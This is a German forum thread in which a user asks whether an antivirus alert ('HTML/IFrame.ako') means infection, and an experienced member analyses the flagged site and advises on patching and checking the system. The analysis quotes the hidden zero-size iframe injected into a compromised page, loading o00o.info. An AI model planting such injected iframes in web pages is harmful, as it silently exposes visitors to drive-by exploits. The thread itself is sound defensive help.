HTML-Scriptvirus?

[PsycoSnatch]

Habe vorhin nur bei google nach der Aktion suchen wollen, wo ein EBayer seinen "Neuen Ordner" verkaufen wollte, und auf einmal meldet mir Avira einen Malware-Fund.

das Ding hieß "HTML/IFrame.ako", wurde sofort in die Quarantäne gesteckt und gelöscht, ich lasse grad das System prüfen und Malwarebytes läuft auch.

mir ist bekannt, dass das alles nicht viel nützt (im Ernstfall), aber der PC ist erst frisch Neu-gemacht, da ich ja vor 2 wochen schon derbe Malware Attacken hatte (die sich aber DEUTLICH bemerkbar gemacht haben [deaktivieren der Firewall etc.])

ist das vielleicht nur ein fälschlicherweise als Virus erkanntes Etwas?

mann, habe keine Lust schon wieder den ganzen Stress durchzumachen

Gruß

[spitterfly]

Wie bekommst du es überhaupt hin dir so "schlimme" Viren zu holen? ich habe mir erst einmal einen ein bisschen schlimmeren Virus geholt, aber den habe ich zuerst auch ignoriert, was glaube ich nicht so intelligent . Naja wie auch immer ... welchen Stress nochmal durchmachen? -> Anti Vir laufen lassen, in den meisten Fällen nicht mal nötig, wenn man den Virus sofort löscht, zurücklehnen und ein Bier trinken.
Um auf deine Frage zu Antworten:
Höchstwahrscheinlich hat dein Anti-Virus da ein Fehler gemacht .. auf EBay ein Virus holen .. fragwürdig .. jedenfalls musst du dir keine Sorgen machen da 1. die meisten Viren relativ harmlos sind und 2. dein Anti-Vir den Virus ja schon gelöscht hat..

MfG

[PsycoSnatch]

Vielen Dank.

nein, nicht auf Ebay. Ich wollte bei google nach der STory suchen, wo jemand einen "Neuen Ordner" verkaufen wollte, und das Gebot bei 200 Euro stand etc.

lustige Geschichte

kann mir also dieses mal nichts vorwerfen.

Antivir ist jetzt durchgelaufen, nichts gefunden.

naja, aber habe trotzdem wieder Panik um meine Passwörter und vor allem davor, dass jemand mit meiner IP irgend n scheiss macht.

man man man wie ich das hasse, dieses Gefühl

[Kugelfisch23]

das Ding hieß "HTML/IFrame.ako", wurde sofort in die Quarantäne gesteckt und gelöscht, ich lasse grad das System prüfen und Malwarebytes läuft auch.

Beachte, dass du bei einem Verdacht auf eine Kompromittierung deines Systems dieses von einem separaten Bootmedium aus scannen solltest. Ein Scan von einem System aus, auf dem mutmasslich Malware aktiv ist, ist nur unnötig unzuverlässig, da sich die Malware z.B. über Rootkits tarnen oder den Malwarescanner manipulieren könnte.

ist das vielleicht nur ein fälschlicherweise als Virus erkanntes Etwas?

In deinem Fall würde ich allerdings nicht voreilig von einem kompromittierten System ausgehen. Auch wenn sich Avira über die genaue Bedeutung der Signatur HTML/IFrame.ako in seiner Malware-Datenbank ausschweigt, handelt es sich maximal um ein iframe-Element, das eine Seite einbindet, die bekanntermassen versucht, Schwachstellen in Browsern und/oder Plugins auszunutzen.
In sofern wäre interessant, ob dein Browser zum fraglichen Zeitpunkt aktuell war und ob lediglich aktuell gehaltene Plugins ohne bekannte Schwachstellen aktiv waren. Dann dürfte die Wahrscheinlichkeit einer Kompromittierung auf diesem Wege sehr gering sein, da entsprechende unbekannte Schwachstellen schlicht zu wertvoll sind, um sie zum Kompromittieren von vergleichsweise wertlosen, privat genutzten Systemen einzusetzen.
Davon abgesehen wäre auch der URI zur Webseite, die den mutmasslich schädlichen Code enthielt, hilfreich. Dann könnte man sich die Seite, sofern sie in der Zwischenzeit nicht verändert wurde, genauer ansehen und auf mögliche Ursachen für den AntiVir-Befund untersuchen. Möglicherweise handelt es sich in der Tat um einen falschpositiven Treffer.

welchen Stress nochmal durchmachen? -> Anti Vir laufen lassen, in den meisten Fällen nicht mal nötig, wenn man den Virus sofort löscht, zurücklehnen und ein Bier trinken

Löschen kann man Malware aber nur dann zuverlässig, wenn bis zu diesem Zeitpunkt nachweislich kein Schadcode zur Ausführung gekommen ist - etwa, wenn es sich um ein Binary mit einem klassischen Virus oder ein trojanisches Pferd handelt, das noch vor der Ausführung durch einen On-Access-Scanner erkannt wird. Ist einmal Schadcode zur Ausführung gekommen (wie hier möglicherweise über eine Schwachstelle der Fall), kann das dann als kompromittiert anzusehende System nur in den seltensten Fällen zuverlässig bereinigt werden.

[PsycoSnatch]

wie scannt man denn von einem anderen Boot-Medium aus?

da brauch man doch eine ANtivirus CD oder nicht? hab ja nur die Freeware Programme.

die Seite war hier die 5. von oben: http://www.google.de/#hl=de&&sa=X&ei...564579658cd647

"Neuer Ordner für Mac - ohne Versandkosten!"

da hab ich drauf geklickt und schon kam die Warnung.

[Kugelfisch23]

da brauch man doch eine ANtivirus CD oder nicht? hab ja nur die Freeware Programme.

Ja, was aber keinen Widerspruch zur Kostenfreiheit (mindestens für Privatanwender) darstellt. So bieten z.B. Avira und Kaspersky ihre Rescue-Systeme kostenlos an (AntiVir Rescue System, ...) - wie auch in http://board.gulli.com/thread/15222.../#post12551252 erwähnt.

die Seite war hier die 5. von oben: [...]
"Neuer Ordner für Mac - ohne Versandkosten!"

Demnach handelte es sich offenbar um http://www.realhomepage.de/members/Powerbookfreak/. In der Tat erkennen dort AntiVir und einige weitere Malwarescanner verdächtiges HTML-Markup. Es ist dies offenbar:

HTML-Code:

<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

am Ende des Dokument. In der Tat werden solche versteckten iframe-Elemente nicht selten in kompromittierte Webseiten eingebaut, um darin eine Webseite nachladen zu können, die z.B. versucht, Schwachstellen in den Browsern der Besucher auszunutzen, gemäss http://forum.joomla.org/viewtopic.php?t=86820 wurden auch bereits bei Angriffen Seiten von exakt dieser Domain (o00o.info) integriert. In sofern ist sehr wahrscheinlich, dass die von dir besuchte Website kompromittiert und das iframe-Element ohne Wissen des Webmasters eingebaut wurde. Auch ist in sofern wahrscheinlich, dass über o00o.info einmal Missbrauch getrieben wurde. Ferner ist als Domain-Eigentümer eine offensichtlich nicht existente Person eingetragen:

Code:

Registrant Name:James  Bond
Registrant Organization:Dotstar, inc
Registrant Street1:126-12 22AVE , Fushing
[...]
Registrant City:Newyork
Registrant State/Province:AL
Registrant Postal Code:11355
Registrant Country:US

Die Berichte über die Angriffe, bei welchen diese spezifischen iframe-Elemente integriert wurden, stammen jedoch aus dem Jahre 2006. Inzwischen ist unter o00o.info offenbar bloss noch eine generische Domain-Parking-Seite von domainsponsor.com zu finden. Gemäss http://web.archive.org/web/*/http://...rtal/index.php lagen dort in den Jahren 2006/2007 andere Inhalte. In sofern dürfte o00o.info Heute mutmasslich harmlos sein.


Dennoch gilt natürlich, dass du nie zuverlässig verhindern kannst, eine infizierte Webseite zu besuchen. Auch grosse, vermeintlich seriöse Sites können kompromittiert werden und in Folge Malware verteilen. Demnach musst du selbst dafür sorgen, keinen Browser und keine Plugins mit bekannten Schwachstellen einzusetzen - siehe http://board.gulli.com/thread/15222...-und-erkennen/.

[PsycoSnatch]

Vieln Dank!

aber wurde jetzt nicht ganz schlau, ob's nun gefärhlich war/ist oder nicht?

EDIT***

habs gelesen...

woran erkenne ich denn welche plug-ins, und ob mein Mozilla Schwachstellen aufweisen?

[frogger9]

zB. mit der AntiVir Rescue CD.

http://www.avira.com/de/support-down...-rescue-system

[Kugelfisch23]

aber wurde jetzt nicht ganz schlau, ob's nun gefärhlich war/ist oder nicht?

Ob die eingebundenen Inhalte von o00o.info im Jahre 2006 (als die Angriffe, bei welchen diese iframe-Elemente in fremde Webseiten eingebaut wurden, erfolgten) gefährlich waren, kann ich nicht mehr beurteilen, da ich sie nicht kenne. Wie erwähnt dürften die aktuellen Inhalte jedoch mutmasslich harmlos sein.

woran erkenne ich denn welche plug-ins, und ob mein Mozilla Schwachstellen aufweisen?

Im Falle des von dir nicht näher bezeichneten Mozilla-Browsers (Firefox? Seamonkey?) ist eine automatische Update-Funktion vorhanden, angebotene Updates solltest du umgehend einspielen.
Leider verfügen viele Plugins nicht über zuverlässige Update-Mechanismen. Hier gilt einerseits, die Menge der aktiven Plugins minimal zu halten, andererseits, die installierten Versionen manuell oder automatisiert auf bekannte Schwachstellen zu untersuchen. Hier hilft etwa der Personal Software Inspector von Secunia, wie im verlinkten Sticky in Punkt 2.1 erklärt. Auch die restlichen dort beschriebenen Sicherheitsmassnahmen solltest du übrigens - sofern noch nicht geschehen - unbedingt umsetzen.

[PsycoSnatch]

ok danke!

habe mir zwar den nsticky 2-3 mal durchgelesen, aber
wie kann ich denn jetzt sicher (ja, ich weiss, so GANZ sicher kann man nie sein) sein, dass mein System nicht kompromittiert wurde?

also zumindest wurde dieses Mal keine Firewall ausgeschaltet, und nach Prüfung (wenn auch unzuverlässige) wurde nichts weiter gefunden, im Gegensatz zu vor 2 wochen wo 11 Malware DAteien gefunden wurden.

beim Besuch der Website kam halt nur unten rechts die Warnung (samt Geräusch aus dem PC), mit der Option die
Datei zu entfernen; landete in der Quarantäne und war wohl nur im Cache Speicher (zumindest hoff ich das).

Es kann ja auch nicht sein, dass ich von nun an bei jeder Warnung Panik bekomme und das System neu aufsetze, vielleicht ist das AVira nur sehr sensibel.

[PsycoSnatch]

ich bin jetzt auf einer "Plug-in Check"-Seite (Mozilla Firefox) gelandet, die zeigt mir meine Add-Ons and und ob sie ein Update benötigen, aber wenn ich auf Action: Update klicke, tut sich nix. hmmmmm

EDIT***

habe jetzt das Secunia installiert, und er hat 2 Insecure programs gefunden, einmal den Adobe Flash Player und Apache... wie geh ich nun vor?

[Kugelfisch23]

habe mir zwar den nsticky 2-3 mal durchgelesen, aber
wie kann ich denn jetzt sicher (ja, ich weiss, so GANZ sicher kann man nie sein) sein, dass mein System nicht kompromittiert wurde?

Das ist, wie du offenbar selbst weisst, nicht möglich. Du kannst lediglich versuchen, die monierte Webseite auf Hinweise zu möglichem Schad- bzw. Exploit-Code (wie ich es in http://board.gulli.com/showthread.php?p=13759039 getan habe - allerdings kann ich natürlich nicht nachweisen, dass für dein System dieselben Inhalte unter o00o.info ausgeliefert werden, obwohl ich es stark vermute) sowie dein System auf mögliche Symptome und mit Malwarescannern auf bekannte Malware zu untersuchen. Anhand der Analyse der genannten Webseite ist meines Erachtens relativ wahrscheinlich, dass dadurch keine Kompromittierung erfolgt ist.
Ob dein System jedoch bereits durch den Besuch einer anderen Webseite etwa über das Flash-Player mit bekannten Schwachstellen kompromittiert wurde, kann ich (insbesondere aus der Ferne) nicht beurteilen. Das wäre durchaus möglich, und ein On-Access-Malwarescanner (in deinem Fall AntiVir) kann unbekannte Malware auch nicht zuverlässig erkennen. In diesem Fall würde es auch nicht mehr helfen, die Schwachstellen nachträglich zu schliessen.

habe jetzt das Secunia installiert, und er hat 2 Insecure programs gefunden, einmal den Adobe Flash Player und Apache... wie geh ich nun vor?

Die aktuelle Version des Flash-Player-Plugins kannst du unter http://get.adobe.com/de/flashplayer/ herunterladen. Das solltest du umgehend tun. Ferner solltest du bei dieser Gelegenheit alle nicht zwingend benötigten Plugins in deinem Browser deaktivieren (Adobe-Reader-Plugin, Java-Embedding-Plugin, ...). Diese bieten nur unnötig Angriffsfläche, eine eventuelle Schwachstelle kann von jeder besuchten Webseite ausgenutzt werden.

Hast du auf deinem System wissentlich einen Apache-Webserver laufen, eventuell aus einem Programmpaket wie XAMPP, EasyPHP, ...? Wenn ja, spiele die nötige Aktualisierung ein. Wenn nicht, wäre das ein mögliches Symptom für die Kompromittierung deines Systems.

[PsycoSnatch]

also ich habe, nach der Neu-Installation, von der Biostar Seite mehrere Treiber installieren müssen, für das Motherboard (NVIDIA Corporation).

is das eine Erklärung für das Apache 2.0 dingens?

[PsycoSnatch]

also ich habe jetzt den Ethernet Treiber neu installiert,
den PC Neu-Gestartet und habe jetzt 100% Sauberkeit laut
Secunia.

das Apache Dings ist komplett weg.

Gutes Zeichen?

[Kugelfisch23]

Mir wäre kein Treiber-Paket bekannt, das eigenmächtig einen Apache-2.0-Webserver(?) auf dem System installiert, was aber nicht zwingend bedeutet, dass es keins gibt (ein Link zum ursprünglich verwendeten Installer wäre hilfreich, um das überprüfen zu können). Bist du dir sicher, dass er nach dem Treiberupdate deinstalliert wurde, oder taucht er bloss nicht mehr als veraltet im Secunia PSI auf? Über den Taskmanager, ggf. in Verbindung mit netstat, oder über TCPView (http://technet.microsoft.com/en-us/s...rnals/bb897437) lässt sich leicht bestimmen, ob ein Apache-Prozess läuft und an welchem Port er seine Dienste anbietet. Wenn Apache läuft, rufe einmal http://localhost:<port>/ in deinem Browser auf (wobei du <port> durch den z.B. per TCPView ermittelten Server-Port ersetzt), vielleicht geht aus der ausgelieferten Webseite hervor, aus welchem Programmpaket der Apache stammt.

[PsycoSnatch]

müsste denn dann "Apache" irgendwie dort stehen?

tu's jedenfalls nicht.

außerdem sind bei den "System Process" Einträgen verschiedene IP Addressen, ist das normal?

[Kugelfisch23]

müsste denn dann "Apache" irgendwie dort stehen?

Nicht zwingend, aber mindestens bei einer legitimen Installation wird mutmasslich apache im Image-Namen auftauchen (apache.exe o.ä.). Andernfalls wäre die Liste der Namen der Prozesse, die auf deinem System Dienste anbietet (Status LISTENING) interessant. Wie erwähnt wäre auch ein Link zum Treiber, von dem zu vermutest, dass er ungefragt einen Apache-Webserver installiert, von Interesse - dann könnte man diesen Verdacht überprüfen.

außerdem sind bei den "System Process" Einträgen verschiedene IP Addressen, ist das normal?

D.h. Quell- und Zieladresse sind unterschiedlich? Oder existieren mehrere Einträge mit unterschiedlichen Quell- bzw. Zieladressen? Welche IP-Adressen betrifft das konkret?

[PsycoSnatch]

also ich habe von http://www.biostar.com.tw/app/en/support/download.php

für mein Motherboard die Treiber herbekommen.

NF61S Micro AM2 Ver. 1.0 und dann

Chipset Ethernet

XP x86

jedenfalls war beim erneuten Installieren kurz die Frage aufgetaucht, ob ich denn (weiss es nicht mehr so genau)
so eine Option dazu installieren will, und dieses Mal habe ich NEIN gedrückt, und dann war nix mehr mit Apache.

Listening:

System - Local Port : microsoft-ds
System - Local Port : netbios-ssn

svchost.exe - Local Port : epmap
svchost.exe - Local Port : 2869

bei ALLEN Einträgen ist Local Address MEIN Computername, falls das irgendwie hilft

[Kugelfisch23]

jedenfalls war beim erneuten Installieren kurz die Frage aufgetaucht, ob ich denn (weiss es nicht mehr so genau)
so eine Option dazu installieren will, und dieses Mal habe ich NEIN gedrückt, und dann war nix mehr mit Apache.

Ok, der Treiber bzw. der wohl beim ersten Mal installierte ForceWare Network Access Manager war mutmasslich in der Tat die Ursache für den Apache-Prozess. Gemäss http://www.file.net/prozess/apache.exe.html (und weiteren Quellen, die sich mit Suchbegriffen wie forceware network access manager apache mit einer beliebigen Suchmaschine finden lassen) wird dadurch ein Apache-Webserver mitinstalliert. Bei der erneuten Installation hast du dich wohl entschieden, den ForceWare Network Access Manager nicht mehr zu installieren.

System - Local Port : microsoft-ds
System - Local Port : netbios-ssn

svchost.exe - Local Port : epmap
svchost.exe - Local Port : 2869

Das sind beides Windows-Dienste, die auf den üblichen Ports Verbindungen annehmen. Die ersten beiden Einträge betreffen das SMB, der Dritte epmap/DCOM, der Letzte UPnP.


In sofern gibt es keine Symptome dafür, dass dein System durch das unsichere Flash-Plugin kompromittiert wurde (was natürlich nicht heisst, dass ich es mit Sicherheit ausschliessen kann - das ist ohne exorbitanten Aufwand schlicht unmöglich).

[PsycoSnatch]

Ich danke dir vielmals für deine Zeit und dein Fachwissen.
Klasse, dass es Leute wie dich im Netz gibt.

Spiele, trotz allem, mit dem Gedanken, erneut alles aufzuspielen, und diesmal von Anfang an (mit 100% Secunia Wert etc.) alles Mögliche richtig zu machen.


1. wenn ich also von Anfang an die Avira aktiv habe, alle plug-ins und add-ons auf Sicherheit geprüft habe, dubiose Seiten und Downloads soweit wie möglich vermeide, habe ich doch gute (natürlich keine 100%-ige) Chancen ein sauberes System zu behalten, oder?

2. bringt Malwarebytes eigentlich auch in Sachen aktivem Schutz etwas, oder dient das nur der SUCHE nach bereits eingefangener Malware?

3. Ist der Umstieg auf Windows 7 lohnenswert? auch, oder vor allem, in Sachen Sicherheit?

Gruß